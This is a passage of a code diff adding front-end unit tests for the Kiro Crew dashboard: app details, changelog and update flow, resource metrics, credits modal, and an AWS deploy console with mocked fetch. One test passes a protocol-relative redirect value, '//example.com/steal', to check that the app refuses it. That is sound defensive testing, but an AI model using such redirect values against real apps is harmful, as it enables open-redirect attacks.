+      serverPlatform: { os: 'linux', arch: 'arm64' },
+    })
+    renderDetail()
+    await loaded()
+
+    expect(screen.getByText('Features')).toBeInTheDocument()
+    expect(screen.getByText('Explains a balance sheet')).toBeInTheDocument()
+
+    expect(screen.getByText('Permissions')).toBeInTheDocument()
+    expect(screen.getByText('API Access')).toBeInTheDocument()
+    expect(screen.getByText('GET /api/ledger')).toBeInTheDocument()
+    expect(screen.getByText('WebSocket Events')).toBeInTheDocument()
+    expect(screen.getByText('ledger.updated')).toBeInTheDocument()
+    expect(screen.getByText('MCP Tools')).toBeInTheDocument()
+    expect(screen.getByText('ledger_query')).toBeInTheDocument()
+    expect(screen.getByText('Storage: yes')).toBeInTheDocument()
+    expect(screen.getByText('Cron: yes')).toBeInTheDocument()
+    expect(screen.getByText('Network: yes')).toBeInTheDocument()
+    expect(screen.getByText(/Memory:/)).toBeInTheDocument()
+
+    expect(screen.getByText('MCP Servers')).toBeInTheDocument()
+    expect(screen.getByText('ledgerd')).toBeInTheDocument()
+    expect(screen.getByText('http://127.0.0.1:9911/mcp')).toBeInTheDocument()
+    expect(screen.getByText('uvx ledgerd')).toBeInTheDocument()
+    expect(screen.getByText('ledger_read_only')).toBeInTheDocument()
+
+    expect(screen.getByText('Tags')).toBeInTheDocument()
+    expect(screen.getByText('finance')).toBeInTheDocument()
+
+    expect(screen.getByText('Resources')).toBeInTheDocument()
+    // Agent paths are shown as bare stems, not manifest paths.
+    expect(screen.getByText('auditor, scribe')).toBeInTheDocument()
+    expect(screen.getByText('SKILL.md')).toBeInTheDocument()
+    expect(screen.getByText('nightly-close')).toBeInTheDocument()
+
+    expect(screen.getByText('Details')).toBeInTheDocument()
+    expect(screen.getByText(/https:\/\/example\.invalid\/ledger-lens/)).toBeInTheDocument()
+    expect(screen.getByText(/2026/)).toBeInTheDocument()
+    expect(screen.getByText(/Origin:/)).toBeInTheDocument()
+    expect(screen.getByText(/Min Kiro Crew: v0\.2\.0/)).toBeInTheDocument()
+  })
+
+  it('shows the platform list for a registry app and no resources card', async () => {
+    listRegistry.mockResolvedValue({
+      apps: [registryRow({ platform: { os: ['darwin', 'linux'] } })],
+      serverPlatform: { os: 'darwin', arch: 'arm64' },
+    })
+    renderDetail()
+    await loaded()
+
+    expect(screen.getByText(/darwin, linux/)).toBeInTheDocument()
+    expect(screen.queryByText('Resources')).not.toBeInTheDocument()
+    expect(screen.queryByText('Permissions')).not.toBeInTheDocument()
+  })
+
+  it('links back to the apps list from the page header', async () => {
+    getApp.mockResolvedValue(installedApp())
+    renderDetail()
+    await loaded()
+
+    fireEvent.click(screen.getByRole('button', { name: /back to apps/i }))
+    expect(await screen.findByText('apps list')).toBeInTheDocument()
+  })
+})

--- a/website/src/test/AppRootCoverage.test.tsx
+++ b/website/src/test/AppRootCoverage.test.tsx
@@ -1,18 +1,39 @@
-import { describe, it, expect, vi } from 'vitest'
-import { screen } from '@testing-library/react'
+/**
+ * Coverage for the App shell surfaces that no other App.*.test.tsx reaches:
+ *
+ * - the version-change changelog gate (`mc-last-version` diffing + section
+ *   filtering) and the changelog modal's own controls
+ * - `handleUpdate` (success + both error-shapes) and the `UpdateOverlay`
+ *   progress/failed/stuck states it mounts
+ * - the header capsule's resource-posture segment and the system-metrics
+ *   segment's error / no-totals branches
+ * - the Kiro credits modal with a bonus pool and a signed-in identity
+ * - the notification popover's pointer-outside and route-change dismissals
+ * - developer mode and the Electron native-menu navigation bridge
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { act, screen, fireEvent, waitFor, within } from '@testing-library/react'
 import { renderWithProviders } from './helpers'
-import App from '../App'
+import { setUpdateProgress } from '../store/dashboardSlice'
 
 vi.mock('../pages/ChatPage', () => ({ default: () => <div data-testid="chat-page">ChatPage</div> }))
+vi.mock('../pages/SystemPage', () => ({ default: () => null }))
+vi.mock('../pages/AgentsPage', () => ({ default: () => null }))
+vi.mock('../pages/ProjectsPage', () => ({ default: () => null }))
+vi.mock('../pages/LogsPage', () => ({ default: () => <div data-testid="logs-page">LogsPage</div> }))
+vi.mock('../pages/DeveloperPage', () => ({ default: () => <div data-testid="developer-page">DeveloperPage</div> }))
+vi.mock('../pages/KiroCrewAgentsPage', () => ({ default: () => null }))
+vi.mock('../pages/CapabilitiesPage', () => ({ default: () => null }))
+vi.mock('../pages/NotificationsPage', () => ({ default: () => null }))
+vi.mock('../pages/SchedulePage', () => ({ default: () => null }))
 vi.mock('../hooks/useWebSocket', () => ({ useWebSocket: () => ({ subscribeLogs: () => {} }) }))
+vi.mock('../hooks/useAgents', () => ({ useAgents: vi.fn(() => ({ agents: [{ name: 'kirocrew' }], defaultAgent: 'kirocrew' })) }))
 vi.mock('../providers/context', () => ({ useProvider: () => ({ id: 'acp' }) }))
-vi.mock('../hooks/useAgents', () => ({
-  useAgents: vi.fn(() => ({ agents: [{ name: 'kirocrew' }], defaultAgent: 'kirocrew' })),
-}))
 vi.mock('../components/MarkdownRenderer', () => ({
   default: ({ content }: { content: string }) => <span>{content}</span>,
   Lightbox: () => null,
 }))
+
 vi.mock('../api/client', () => ({
   api: {
     chatSlots: vi.fn().mockResolvedValue([]),
@@ -26,6 +47,14 @@ vi.mock('../api/client', () => ({
     updateThemeConfig: vi.fn().mockResolvedValue({}),
     listInstances: vi.fn().mockResolvedValue({ instances: [], warm_set_cap: 5 }),
     patchConfig: vi.fn().mockResolvedValue({}),
+    chatSlotAgent: vi.fn().mockResolvedValue({}),
+    chatSlotReasoningEffort: vi.fn().mockResolvedValue({}),
+    chatSlotModel: vi.fn().mockResolvedValue({}),
+    chatMode: vi.fn().mockResolvedValue({}),
+    changelog: vi.fn().mockResolvedValue({ content: '' }),
+    applyUpdate: vi.fn().mockResolvedValue({}),
+    cancelUpdate: vi.fn().mockResolvedValue({}),
+    setAutoUpdate: vi.fn().mockResolvedValue({}),
   },
   isAuthBannerShown: vi.fn(() => false),
   ApiError: class ApiError extends Error {},
@@ -46,12 +75,358 @@ globalThis.ResizeObserver = class {
   disconnect() {}
 } as typeof ResizeObserver
 
+import App from '../App'
+import { api } from '../api/client'
+
+/** Status payload the shell diffs `mc-last-version` against. */
+const STATUS = { uptime: '1h', sessions: 0, messages: 0, version: '0.4.0', update_available: true }
+
+/** A two-release changelog: only the 0.4.0 section is newer than 0.3.0. */
+const CHANGELOG = '## [0.4.0]\n- adds the resource capsule\n\n## [0.3.0]\n- older entry line\n'
+
+type ElectronBridge = {
+  setDevMode?: (v: boolean) => void
+  onNavigate?: (cb: (path: string) => void) => () => void
+  onFullScreenChanged?: (cb: (fs: boolean) => void) => () => void
+  setBadgeCount?: (n: number) => void
+}
+const setElectronBridge = (bridge: ElectronBridge | undefined) => {
+  ;(window as Window & { electronAPI?: ElectronBridge }).electronAPI = bridge
+}
+
+/** Mark first run complete so no onboarding chapter covers the shell. */
+function completeFirstRun() {
+  localStorage.setItem('mc-onboarded', '1')
+  localStorage.setItem('mc-import-onboarded', '1')
+  localStorage.setItem('mc-privacy-acked', '1')
+}
+
+beforeEach(() => {
+  localStorage.clear()
+  completeFirstRun()
+  setElectronBridge(undefined)
+  vi.mocked(api.status).mockResolvedValue(STATUS as never)
+  vi.mocked(api.changelog).mockResolvedValue({ content: CHANGELOG } as never)
+  vi.mocked(api.applyUpdate).mockResolvedValue({} as never)
+  vi.mocked(api.cancelUpdate).mockResolvedValue({} as never)
+  vi.mocked(api.setAutoUpdate).mockResolvedValue({} as never)
+  vi.mocked(api.system).mockResolvedValue({ mem_used_gb: 4, mem_total_gb: 16, cpu_pct: 25, disk_total_gb: 100, disk_free_gb: 60 } as never)
+  vi.mocked(api.sessionsUsage).mockResolvedValue({ usage: { available: false } } as never)
+})
+
+afterEach(() => {
+  vi.useRealTimers()
+  setElectronBridge(undefined)
+})
+
+/** Render at /chat with a version the shell will treat as newly installed. */
+function renderShell(route = '/chat') {
+  localStorage.setItem('mc-last-version', '0.3.0')
+  return renderWithProviders(<App />, { route })
+}
+
+const changelogDialog = () => screen.findByRole('dialog', { name: 'Changelog' })
+
 describe('baseline probe', () => {
   it('renders the shell', () => {
-    localStorage.setItem('mc-onboarded', '1')
-    localStorage.setItem('mc-import-onboarded', '1')
-    localStorage.setItem('mc-privacy-acked', '1')
+    localStorage.setItem('mc-last-version', '0.4.0')
     renderWithProviders(<App />, { route: '/chat' })
     expect(screen.getByTestId('dashboard-shell')).toBeInTheDocument()
+  })
+})
+
+describe('App — version-change changelog gate', () => {
+  it('shows only the sections newer than the last seen version', async () => {
+    renderShell()
+    const dialog = await changelogDialog()
+    expect(within(dialog).getByText("What's new")).toBeInTheDocument()
+    expect(within(dialog).getByText(/adds the resource capsule/)).toBeInTheDocument()
+    expect(within(dialog).queryByText(/older entry line/)).toBeNull()
+    // The seen-version baseline advances even though the modal is still open.
+    await waitFor(() => expect(localStorage.getItem('mc-last-version')).toBe('0.4.0'))
+  })
+
+  it('closes the changelog from its close button', async () => {
+    renderShell()
+    const dialog = await changelogDialog()
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Close' }))
+    await waitFor(() => expect(screen.queryByRole('dialog', { name: 'Changelog' })).toBeNull())
+  })
+})
+
+describe('App — changelog modal controls', () => {
+  it('persists the auto-update preference from the changelog switch', async () => {
+    renderShell()
+    const dialog = await changelogDialog()
+    const toggle = within(dialog).getByRole('switch', { name: 'Auto-update on restart' })
+    expect(toggle.getAttribute('aria-checked')).toBe('true')
+
+    fireEvent.click(toggle)
+    await waitFor(() => expect(api.setAutoUpdate).toHaveBeenCalledWith(false))
+    expect(toggle.getAttribute('aria-checked')).toBe('false')
+  })
+})
+
+/** Open the changelog and take the "Update Now" path into the progress overlay. */
+async function startUpdate(route = '/chat') {
+  const rendered = renderShell(route)
+  const dialog = await changelogDialog()
+  fireEvent.click(within(dialog).getByRole('button', { name: 'Update Now' }))
+  return rendered
+}
+
+describe('App — applying an update', () => {
+  it('replaces the changelog with the progress overlay', async () => {
+    await startUpdate()
+    await waitFor(() => expect(api.applyUpdate).toHaveBeenCalled())
+    expect(await screen.findByText('Updating Kiro Crew…')).toBeInTheDocument()
+    expect(screen.queryByRole('dialog', { name: 'Changelog' })).toBeNull()
+    // No step reported yet: the overlay shows its neutral waiting copy.
+    expect(screen.getByText('Starting update…')).toBeInTheDocument()
+    expect(screen.getByText('Page will reconnect when ready…')).toBeInTheDocument()
+  })
+
+  it('surfaces the server-supplied reason when applying fails', async () => {
+    vi.mocked(api.applyUpdate).mockRejectedValueOnce(new Error(JSON.stringify({ error: 'gateway is mid-restart' })))
+    await startUpdate()
+
+    const dialog = await screen.findByRole('dialog', { name: 'Update error' })
+    expect(within(dialog).getByText('Update Failed')).toBeInTheDocument()
+    expect(within(dialog).getByText('gateway is mid-restart')).toBeInTheDocument()
+    // The overlay is not mounted: the apply never started.
+    expect(screen.queryByText('Updating Kiro Crew…')).toBeNull()
+
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Dismiss' }))
+    await waitFor(() => expect(screen.queryByRole('dialog', { name: 'Update error' })).toBeNull())
+  })
+
+  it('falls back to the raw failure text when it is not a JSON body', async () => {
+    vi.mocked(api.applyUpdate).mockRejectedValueOnce(new Error('no space left on device'))
+    await startUpdate()
+    const dialog = await screen.findByRole('dialog', { name: 'Update error' })
+    expect(within(dialog).getByText('no space left on device')).toBeInTheDocument()
+  })
+})
+
+describe('App — update progress overlay', () => {
+  it('marks earlier steps done and times the active one', async () => {
+    const { store } = await startUpdate()
+    await screen.findByText('Updating Kiro Crew…')
+
+    act(() => { store.dispatch(setUpdateProgress({ step: 'building', detail: 'compiling the wheel' })) })
+
+    expect(screen.getByText('compiling the wheel')).toBeInTheDocument()
+    // Every step label is listed; the two before "building" have completed.
+    expect(screen.getByText('Pulling latest changes')).toBeInTheDocument()
+    expect(screen.getByText('Rebuilding package')).toBeInTheDocument()
+    expect(screen.getByText('Restarting server')).toBeInTheDocument()
+    expect(screen.getByText('0s')).toBeInTheDocument()
+  })
+
+})
+
+describe('App — header capsule resource posture', () => {
+  it('flags a critical host posture with the free-memory reason and subagent cap', async () => {
+    localStorage.setItem('mc-last-version', '0.4.0')
+    vi.mocked(api.system).mockResolvedValue({
+      mem_used_gb: 15, mem_total_gb: 16, cpu_pct: 95, disk_total_gb: 100, disk_free_gb: 5,
+      resource_posture: 'critical', resource_available_gb: 1.25, subagent_cap: 2,
+    } as never)
+    renderWithProviders(<App />, { route: '/chat' })
+
+    expect(await screen.findByText('Critical')).toBeInTheDocument()
+    expect(screen.getByText('· cap: 2')).toBeInTheDocument()
+    expect(screen.getByTitle(/Host memory is critically low \(1.3 GB free\)/)).toBeInTheDocument()
+  })
+
+  it('flags a tight host posture', async () => {
+    localStorage.setItem('mc-last-version', '0.4.0')
+    vi.mocked(api.system).mockResolvedValue({
+      mem_used_gb: 12, mem_total_gb: 16, cpu_pct: 60, disk_total_gb: 100, disk_free_gb: 30,
+      resource_posture: 'tight', resource_available_gb: 3,
+    } as never)
+    renderWithProviders(<App />, { route: '/chat' })
+
+    expect(await screen.findByText('Tight')).toBeInTheDocument()
+    expect(screen.getByTitle(/Host memory is tight \(3.0 GB free\)/)).toBeInTheDocument()
+    // No cap reported, so no cap clause is appended.
+    expect(screen.queryByText(/cap:/)).toBeNull()
+  })
+
+  it('leaves the capsule clean when the host has ample headroom', async () => {
+    localStorage.setItem('mc-last-version', '0.4.0')
+    vi.mocked(api.system).mockResolvedValue({
+      mem_used_gb: 2, mem_total_gb: 16, cpu_pct: 5, disk_total_gb: 100, disk_free_gb: 90,
+      resource_posture: 'ample', resource_available_gb: 12,
+    } as never)
+    renderWithProviders(<App />, { route: '/chat' })
+
+    await screen.findByTestId('chat-page')
+    expect(screen.queryByText('Tight')).toBeNull()
+    expect(screen.queryByText('Critical')).toBeNull()
+  })
+})
+
+describe('App — system metrics segment', () => {
+  beforeEach(() => {
+    localStorage.setItem('mc-last-version', '0.4.0')
+    localStorage.setItem('mc-topbar-metrics', '1')
+  })
+
+  it('shows an unavailable pill when the metrics fetch fails, and hides on click', async () => {
+    vi.mocked(api.system).mockRejectedValue(new Error('probe unreachable'))
+    renderWithProviders(<App />, { route: '/chat' })
+
+    const pill = await screen.findByText('metrics unavailable')
+    fireEvent.click(pill)
+    await waitFor(() => expect(localStorage.getItem('mc-topbar-metrics')).toBe('0'))
+    expect(screen.queryByText('metrics unavailable')).toBeNull()
+  })
+
+  it('renders placeholders for readouts the host cannot report', async () => {
+    vi.mocked(api.system).mockResolvedValue({
+      mem_used_gb: 0, mem_total_gb: 0, cpu_pct: null, disk_total_gb: 0, disk_free_gb: 0,
+    } as never)
+    renderWithProviders(<App />, { route: '/chat' })
+
+    const cpu = await screen.findByTitle('CPU: unavailable')
+    expect(cpu.textContent).toContain('—')
+    expect(screen.getByTitle('Memory: unavailable').textContent).toContain('—')
+    expect(screen.getByTitle('Disk: unavailable').textContent).toContain('—')
+  })
+})
+
+describe('App — Kiro credits modal', () => {
+  const usageWithBonus = (startUrl: string) => ({
+    usage: {
+      credits_used: 8000, credits_plan: 10000, credits_overage: 0,
+      bonus_limit: 2000, bonus_used: 500, bonus_label: 'Welcome credits',
+      bonus_expires_label: 'expires 2026-09-01',
+      plan: 'KIRO POWER', resets: '2026-09-01', overage_rate: '0.04', cost_usd: 1.5,
+      account_type: 'Social', email: 'builder@example.com', start_url: startUrl,
+    },
+  })
+
+  beforeEach(() => { localStorage.setItem('mc-last-version', '0.4.0') })
+
+  it('breaks the total into a bonus pool and a plan pool', async () => {
+    vi.mocked(api.sessionsUsage).mockResolvedValue(usageWithBonus('https://example.awsapps.com/start') as never)
+    renderWithProviders(<App />, { route: '/chat' })
+
+    fireEvent.click(await screen.findByRole('button', { name: /^Kiro credits:/ }))
+    const dialog = await screen.findByRole('dialog')
+    expect(within(dialog).getByText('Breakdown')).toBeInTheDocument()
+    expect(within(dialog).getByText('Welcome credits')).toBeInTheDocument()
+    expect(within(dialog).getByText('expires 2026-09-01')).toBeInTheDocument()
+    expect(within(dialog).getByText('KIRO POWER')).toBeInTheDocument()
+    expect(within(dialog).getByText('Resets 2026-09-01')).toBeInTheDocument()
+    // Bonus present, so the total is pooled and labelled as a total.
+    expect(within(dialog).getByText('8,500')).toBeInTheDocument()
+    expect(within(dialog).getByText('/ 12,000 credits total')).toBeInTheDocument()
+    expect(within(dialog).getByText('$1.50 USD')).toBeInTheDocument()
+    expect(within(dialog).getByText('Signed in with Social login · example.awsapps.com')).toBeInTheDocument()
+  })
+
+  it('drops the issuer host when the start URL will not parse', async () => {
+    vi.mocked(api.sessionsUsage).mockResolvedValue(usageWithBonus('not-a-url') as never)
+    renderWithProviders(<App />, { route: '/chat' })
+
+    fireEvent.click(await screen.findByRole('button', { name: /^Kiro credits:/ }))
+    const dialog = await screen.findByRole('dialog')
+    expect(within(dialog).getByText('Signed in with Social login')).toBeInTheDocument()
+  })
+})
+
+describe('App — notification popover dismissal', () => {
+  beforeEach(() => { localStorage.setItem('mc-last-version', '0.4.0') })
+
+  it('closes on a pointer press outside the bell and its popover', async () => {
+    renderWithProviders(<App />, { route: '/chat' })
+    const bell = await screen.findByLabelText('Notifications')
+
+    fireEvent.click(bell)
+    expect(bell.getAttribute('aria-expanded')).toBe('true')
+
+    fireEvent.pointerDown(document.body)
+    expect(bell.getAttribute('aria-expanded')).toBe('false')
+  })
+
+  it('stays open when the press lands on the bell itself', async () => {
+    renderWithProviders(<App />, { route: '/chat' })
+    const bell = await screen.findByLabelText('Notifications')
+
+    fireEvent.click(bell)
+    fireEvent.pointerDown(bell)
+    expect(bell.getAttribute('aria-expanded')).toBe('true')
+  })
+
+  it('closes when the route changes underneath it', async () => {
+    let navigateFromMenu: ((path: string) => void) | undefined
+    setElectronBridge({ onNavigate: cb => { navigateFromMenu = cb; return () => { navigateFromMenu = undefined } } })
+    renderWithProviders(<App />, { route: '/chat' })
+    const bell = await screen.findByLabelText('Notifications')
+
+    fireEvent.click(bell)
+    expect(bell.getAttribute('aria-expanded')).toBe('true')
+
+    act(() => navigateFromMenu?.('/logs'))
+    await screen.findByTestId('logs-page')
+    expect(bell.getAttribute('aria-expanded')).toBe('false')
+  })
+})
+
+describe('App — Electron bridges', () => {
+  beforeEach(() => { localStorage.setItem('mc-last-version', '0.4.0') })
+
+  it('relays the boot dev-mode state to the native shell', async () => {
+    const setDevMode = vi.fn()
+    setElectronBridge({ setDevMode })
+    renderWithProviders(<App />, { route: '/chat' })
+    await screen.findByTestId('chat-page')
+    expect(setDevMode).toHaveBeenCalledWith(false)
+  })
+
+  it('routes a plain in-app path from the native menu and ignores a host-relative one', async () => {
+    let navigateFromMenu: ((path: string) => void) | undefined
+    setElectronBridge({ onNavigate: cb => { navigateFromMenu = cb; return () => { navigateFromMenu = undefined } } })
+    renderWithProviders(<App />, { route: '/chat' })
+    await screen.findByTestId('chat-page')
+
+    act(() => navigateFromMenu?.('/logs'))
+    expect(await screen.findByTestId('logs-page')).toBeInTheDocument()
+
+    // Protocol-relative targets are refused by construction, so the route holds.
+    act(() => navigateFromMenu?.('//example.com/steal'))
+    expect(screen.getByTestId('logs-page')).toBeInTheDocument()
+  })
+})
+
+describe('App — developer mode', () => {
+  beforeEach(() => { localStorage.setItem('mc-last-version', '0.4.0') })
+
+  it('adds the Developer rail entry with an unseen dot, then clears it on visit', async () => {
+    renderWithProviders(<App />, { route: '/chat' })
+    await screen.findByTestId('chat-page')
+    expect(screen.queryByRole('button', { name: 'Developer' })).toBeNull()
+
+    act(() => { window.dispatchEvent(new CustomEvent('mc-dev-mode-changed', { detail: true })) })
+
+    const devRow = await screen.findByRole('button', { name: 'Developer' })
+    expect(devRow.querySelector('.animate-pulse')).toBeTruthy()
+
+    fireEvent.click(devRow)
+    await screen.findByTestId('developer-page')
+    expect(devRow.querySelector('.animate-pulse')).toBeNull()
+  })
+
+  it('drops the Developer rail entry when developer mode is switched back off', async () => {
+    renderWithProviders(<App />, { route: '/chat' })
+    await screen.findByTestId('chat-page')
+
+    act(() => { window.dispatchEvent(new CustomEvent('mc-dev-mode-changed', { detail: true })) })
+    expect(await screen.findByRole('button', { name: 'Developer' })).toBeInTheDocument()
+
+    act(() => { window.dispatchEvent(new CustomEvent('mc-dev-mode-changed', { detail: false })) })
+    await waitFor(() => expect(screen.queryByRole('button', { name: 'Developer' })).toBeNull())
   })
 })

--- a/website/src/test/ArtifactDeployPageCoverage.test.tsx
+++ b/website/src/test/ArtifactDeployPageCoverage.test.tsx
@@ -1,0 +1,624 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { screen, waitFor, fireEvent } from '@testing-library/react'
+import { useLocation } from 'react-router-dom'
+import ArtifactDeployPage from '../pages/ArtifactDeployPage'
+import { renderWithProviders } from './helpers'
+
+/**
+ * ArtifactDeployPage: the write paths.
+ *
+ * ArtifactDeployPage.test.tsx covers what the console RENDERS from its three
+ * read queries. This file covers what it SENDS: the profile registry mutations,
+ * the IAM-policy loader, the two-call recall/destroy guard (preview → confirm
+ * bound to the previewed resources), and the pending-confirmation card.
+ *
+ * The page talks to the deploy backend through raw `fetch`, so every test drives
+ * one stub that routes on URL + method and can be told which status to answer
+ * with — that is the only way to reach the `status >= 400` notice branches.
+ */
+
+type Json = Record<string, unknown>
+
+interface FetchCfg {
+  profiles?: Json[]
+  defaultProfile?: string
+  available?: string[]
+  sites?: Json[]
+  webapps?: Json[]
+  pending?: Json[]
+  policy?: Json
+  verify?: Json
+  /** answer for POST / PUT / DELETE on the profile registry */
+  write?: { status: number; body: Json }
+  /** answer for the FIRST (preview) call of the recall/destroy guard */
+  preview?: { status: number; body: Json }
+  /** answer for the SECOND (confirm: true) call */
+  commit?: { status: number; body: Json }
+  confirmPending?: { status: number; body: Json }
+  dismissPending?: { status: number; body: Json }
+}
+
+interface Call { url: string; method: string; body: Json | null }
+
+const PROFILES: Json[] = [
+  { name: 'ship-prod', region: 'us-west-2', account: '123456789012', verified_at: '2026-07-14T00:00:00+00:00', note: '' },
+  { name: 'ship-sandbox', region: 'us-east-1', account: '', verified_at: '', note: '' },
+]
+
+const SITE: Json = {
+  site_id: 'blog', bucket: 'b', distribution_id: 'd',
+  status: 'deployed', url: 'https://d111.cloudfront.net', profile: 'ship-prod',
+}
+
+function installFetch(cfg: FetchCfg = {}): Call[] {
+  const calls: Call[] = []
+  const reply = (status: number, data: Json) =>
+    ({ ok: status < 400, status, json: async () => data }) as unknown as Response
+  const fn = vi.fn(async (url: string, init?: RequestInit) => {
+    const u = String(url)
+    const method = (init?.method ?? 'GET').toUpperCase()
+    const body = init?.body ? (JSON.parse(String(init.body)) as Json) : null
+    calls.push({ url: u, method, body })
+    if (u.startsWith('/api/artifacts')) return reply(200, { artifacts: cfg.webapps ?? [] })
+    if (u.endsWith('/list')) return reply(200, { sites: cfg.sites ?? [], configured: true })
+    if (u.endsWith('/pending')) return reply(200, { pending: cfg.pending ?? [] })
+    if (u.endsWith('/confirm')) return reply(cfg.confirmPending?.status ?? 200, cfg.confirmPending?.body ?? { ok: true })
+    if (u.endsWith('/dismiss')) return reply(cfg.dismissPending?.status ?? 200, cfg.dismissPending?.body ?? { ok: true })
+    if (u.includes('/iam-policy')) return reply(200, cfg.policy ?? { policy: 'STATIC-POLICY-JSON' })
+    if (u.endsWith('/verify')) {
+      return reply(200, cfg.verify ?? {
+        reachable: true, profile: 'ship-prod', account: '123456789012', note: 'sts + s3 + cloudfront reachable',
+      })
+    }
+    if (u.endsWith('/recall') || u.endsWith('/destroy')) {
+      return body?.confirm
+        ? reply(cfg.commit?.status ?? 200, cfg.commit?.body ?? { ok: true })
+        : reply(cfg.preview?.status ?? 200, cfg.preview?.body ?? { resources: { bucket: 'bkt-9f3', distribution_id: 'E1DIST' } })
+    }
+    if (u.includes('/profiles')) {
+      return method === 'GET'
+        ? reply(200, {
+            profiles: cfg.profiles ?? PROFILES,
+            default: cfg.defaultProfile ?? 'ship-prod',
+            available: cfg.available ?? [],
+          })
+        : reply(cfg.write?.status ?? 200, cfg.write?.body ?? { ok: true })
+    }
+    return reply(200, {})
+  })
+  vi.stubGlobal('fetch', fn)
+  return calls
+}
+
+/** Stub the clipboard on the REAL navigator — spreading it into a fake drops
+ *  every prototype accessor the render tree reads (userAgent, language). */
+function installClipboard() {
+  const writeText = vi.fn()
+  Object.defineProperty(window.navigator, 'clipboard', { value: { writeText }, configurable: true })
+  return writeText
+}
+
+function webapp(slug: string, over: { url?: string; status?: string; estimates?: Json[] } = {}): Json {
+  return {
+    slug,
+    name: slug,
+    kind: 'webapp',
+    source: 'chat',
+    description: '',
+    tags: [],
+    version: 1,
+    created_at: '2026-07-10T10:00:00Z',
+    updated_at: '2026-07-10T10:00:00Z',
+    webapp_metadata: {
+      slug,
+      deploy_target: { provider: 'aws', region: 'us-west-2', public_url: over.url ?? '', profile: 'ship-prod' },
+      lifecycle: { persistent: true, ttl_hours: 72, status: over.status ?? 'draft' },
+      cost: { model: 'ttl-window', estimates: over.estimates ?? [{ views: 100, usd: 0.02 }] },
+    },
+  }
+}
+
+function pendingEntry(over: Json = {}): Json {
+  return {
+    id: 'p1',
+    site_id: 'kanban-preview',
+    artifact_slug: 'kanban',
+    local_dir: '',
+    profile: 'ship-prod',
+    region: 'us-west-2',
+    ttl_hours: 24,
+    scan_summary: 'clean',
+    created_at_epoch: Math.floor(Date.now() / 1000) - 600,
+    ...over,
+  }
+}
+
+/** Renders the pathname so a navigation away from the console is observable. */
+function LocationProbe() {
+  const { pathname } = useLocation()
+  return <span>route: {pathname}</span>
+}
+
+function renderPage() {
+  return renderWithProviders(<><ArtifactDeployPage /><LocationProbe /></>)
+}
+
+const profilesLoaded = () => screen.findByText(/AWS Profiles \(2\)/)
+const writes = (calls: Call[], fragment: string) =>
+  calls.filter((c) => c.method !== 'GET' && c.url.includes(fragment))
+
+describe('ArtifactDeployPage — navigation, disclosure, and copy affordances', () => {
+  beforeEach(() => vi.unstubAllGlobals())
+  afterEach(() => vi.restoreAllMocks())
+
+  it('takes the Back control out of the console and into the gallery', async () => {
+    installFetch()
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: /Back to Artifacts/i }))
+    expect(screen.getByText('route: /artifacts')).toBeInTheDocument()
+  })
+
+  it('collapses the getting-started guide, which starts expanded', async () => {
+    installFetch()
+    renderPage()
+    expect(await screen.findByText('1. Authenticate to AWS')).toBeInTheDocument()
+    fireEvent.click(screen.getByText(/Getting started \(one-time AWS setup\)/))
+    expect(screen.queryByText('1. Authenticate to AWS')).toBeNull()
+  })
+
+  it('expands the security model, which starts collapsed', async () => {
+    installFetch()
+    renderPage()
+    await profilesLoaded()
+    expect(screen.queryByText('Your credentials never touch Kiro Crew.')).toBeNull()
+    fireEvent.click(screen.getByText(/How this is secured/))
+    expect(screen.getByText('Your credentials never touch Kiro Crew.')).toBeInTheDocument()
+  })
+
+  it('copies a setup command verbatim, comment and all', async () => {
+    installFetch()
+    const writeText = installClipboard()
+    renderPage()
+    const copyButtons = await screen.findAllByRole('button', { name: 'Copy' })
+    expect(copyButtons).toHaveLength(2)
+    fireEvent.click(copyButtons[0])
+    expect(writeText).toHaveBeenCalledWith(expect.stringContaining('aws configure sso'))
+  })
+
+  it('states the empty case for both the registry and the deployment list', async () => {
+    installFetch({ profiles: [], defaultProfile: '' })
+    renderPage()
+    expect(await screen.findByText(/No profiles yet/)).toBeInTheDocument()
+    expect(screen.getByText(/No deployments yet/)).toBeInTheDocument()
+    expect(screen.getByText(/AWS Profiles \(0\)/)).toBeInTheDocument()
+  })
+
+  it('re-queries the deployment sources when Refresh is pressed', async () => {
+    const calls = installFetch({ sites: [SITE] })
+    renderPage()
+    await screen.findByText(/Deployments \(1\)/)
+    const before = calls.filter((c) => c.url.endsWith('/list')).length
+    fireEvent.click(screen.getByRole('button', { name: /Refresh/ }))
+    await waitFor(() => expect(calls.filter((c) => c.url.endsWith('/list')).length).toBeGreaterThan(before))
+  })
+})
+
+describe('ArtifactDeployPage — profile registry mutations', () => {
+  beforeEach(() => vi.unstubAllGlobals())
+  afterEach(() => vi.restoreAllMocks())
+
+  it('registers a profile discovered in the AWS config in one click', async () => {
+    const calls = installFetch({ available: ['other-sso'] })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: /other-sso/ }))
+    expect(await screen.findByText("Registered profile 'other-sso'.")).toBeInTheDocument()
+    const [post] = writes(calls, '/profiles')
+    expect(post.method).toBe('POST')
+    expect(post.body).toEqual({ name: 'other-sso', region: 'us-west-2' })
+  })
+
+  it('surfaces the backend reason a registration was refused', async () => {    installFetch({ available: ['other-sso'], write: { status: 400, body: { error: 'profile not found in ~/.aws/config' } } })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: /other-sso/ }))
+    expect(await screen.findByText('Error: profile not found in ~/.aws/config')).toBeInTheDocument()
+  })
+
+  it('falls back to a generic reason when the refusal carries no error field', async () => {
+    installFetch({ available: ['other-sso'], write: { status: 500, body: {} } })
+    renderPage()
+    fireEvent.click(await screen.findByRole('button', { name: /other-sso/ }))
+    expect(await screen.findByText('Error: add failed')).toBeInTheDocument()
+  })
+
+  it('creates and registers a profile from the form, then closes and clears it', async () => {
+    const calls = installFetch()
+    renderPage()
+    await profilesLoaded()
+    fireEvent.click(screen.getByRole('button', { name: /New profile/ }))
+
+    fireEvent.change(screen.getByLabelText('Profile name'), { target: { value: '  fresh-sandbox  ' } })
+    fireEvent.change(screen.getByLabelText('Region'), { target: { value: 'eu-central-1' } })
+    // The account/role pair only exists once the caller opts into writing the
+    // profile into ~/.aws/config.
+    expect(screen.queryByLabelText(/^Account \(12 digits/)).toBeNull()
+    fireEvent.click(screen.getByRole('switch', { name: 'Also create in AWS config' }))
